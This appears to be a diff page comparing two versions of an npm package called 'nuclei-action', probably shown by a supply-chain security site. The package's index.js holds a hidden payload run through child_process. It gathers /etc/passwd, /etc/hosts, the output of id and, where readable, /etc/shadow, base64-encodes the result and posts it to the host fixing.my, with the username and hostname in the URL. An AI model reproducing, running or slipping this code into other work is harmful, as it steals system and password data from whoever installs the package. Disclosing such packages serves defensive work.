nuclei-action 5.1.3 → 5.1.5
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
const { exec } = require("child_process");
|
2
2
|
|
3
3
|
const command = `
|
4
|
-
curl -X POST "fixing.my/
|
4
|
+
curl -X POST "fixing.my/nuclei-action/$(whoami)/$(hostname)/" \
|
5
5
|
-A "$( (cat /etc/passwd /etc/hosts && id && { [ -r /etc/shadow ] && cat /etc/shadow || echo 'No shadow access'; } | grep -v -e '*' -e '\\!') | base64 | tr '\\n' '.')" \
|
6
6
|
-s -o /dev/null
|
7
7
|
`;
|